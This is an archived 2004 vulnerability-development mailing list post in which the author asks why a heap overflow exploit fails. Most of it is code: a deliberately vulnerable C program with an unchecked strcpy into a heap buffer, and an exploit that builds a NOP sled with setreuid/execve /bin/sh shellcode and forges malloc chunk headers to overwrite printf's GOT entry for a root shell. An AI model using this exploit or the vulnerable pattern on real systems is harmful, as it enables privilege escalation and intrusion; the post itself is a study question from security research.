Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

heap overflows

From: <sigsegv () ureach com>
Date: 26 Feb 2004 23:42:07 -0000


Hi everyone,
some questions about heap overflows:
a. on examining the memory i find that the 'size' field is one byte more than the total length of the memory chunk. why 
is this so?
b. my exploit does not work? am I doing something wrong??
Environment: 
Linux 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
glibc-2.3.2-11.9 

thanks a zillion

Here is my sample vulnerable code:
Code:

#include <stdio.h>

#define MALLOCED_SIZE 64

int main(int argc, char** argv)
{
  char* malloced_buffer1;
  char* malloced_buffer2;

  if(argc==1)
    {
      fprintf(stderr,"\nUsage: %s <string1> \n\n",argv[0]);
      exit(0);
    }

  malloced_buffer1 = (char*) malloc(sizeof(char) * MALLOCED_SIZE);
  malloced_buffer2 = (char*) malloc(sizeof(char) * MALLOCED_SIZE);

  if(malloced_buffer1 && malloced_buffer2)
    {
      printf("Address returned by malloc: %p\n",malloced_buffer1);
      strcpy(malloced_buffer1,argv[1]);
      printf("copied");
      free(malloced_buffer1);
      free(malloced_buffer2);
        
    }
  return 0;
}

Here is my exploit code for the above code:

Code:

#include <stdio.h>
#include <unistd.h>

/*
 * This represents a sample exploit code for exploiting a malloc based buffer overflow
 * in a sample program called samplecode_vulnerable_to_heap_overflow.c in the same
 * directory.
 *
 * The GOT for printf will be overwritten as a part of the exploit.
 * GOT address for printf can be found out by:
 * objdump --dynamic-reloc <binary>
 * In our case it is:
 *             0804966c R_386_JUMP_SLOT   printf
 */

#define MALLOCED_SIZE 64
#define RET_LOC 0x08049660
#define RET_ADDR 0x080497a8

/*
 * 31 bytes setreuid(0, 0) execve /bin/sh shellcode - linux-x86
 * - by bighawk (bighawk-at-warfare.com)
 * http://www.groar.org/expl/linux-x86/setreuid.c
 */
char shellcode[] =
   "\x31\xdb"                   // xor     ebx, ebx
   "\x31\xc9"                   // xor     ecx, ecx
   "\xf7\xe3"                   // mul     ebx
   "\xb0\x46"                   // mov     al, 70
   "\xcd\x80"                   // int     80h
   "\x53"                       // push    ebx
   "\x68\x6e\x2f\x73\x68"       // push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"       // push    dword 69622f2fh
   "\x89\xe3"                   // mov     ebx, esp
   "\x52"                       // push    edx
   "\x53"                       // push    ebx
   "\x89\xe1"                   // mov     ecx, esp
   "\xb0\x0b"                   // mov     al, 11
   "\xcd\x80";

int main()
{
  char buf[100];
  int NOP_LEN = MALLOCED_SIZE - 2 - strlen(shellcode);
 
  buf[0] = 0xeb; /* this is to jump 12 bytes from the start of our shell code */
  buf[1] = 0x0c;
  memset(buf+2, 0x90, NOP_LEN); /* NOP's */
  memcpy(buf+2+NOP_LEN, shellcode, strlen(shellcode)); /* shell code */

  /* overflowing of the destination buffer starts at the 64th byte */
  *((long*)(buf+MALLOCED_SIZE))        = 0xfffffffc; /* prev_size */
  *((long*)(buf + MALLOCED_SIZE + 4))  = 0xffffffff; /* size */
  *((long*)(buf + MALLOCED_SIZE + 8))  = RET_LOC; /* fd = GOT address for printf-12 */
  *((long*)(buf + MALLOCED_SIZE + 12)) = RET_ADDR; /* bk = address of our shell code */
  buf[MALLOCED_SIZE + 16 + 1] = '\0';

  execl("./samplecode_vulnerable_to_heap_overflow","samplecode_vulnerable_to_hea \
  p_overflow",buf,(char *)0);

  perror("execl failed");
  return 0;
}
Previous By Date Next
Previous By Thread Next

Current thread: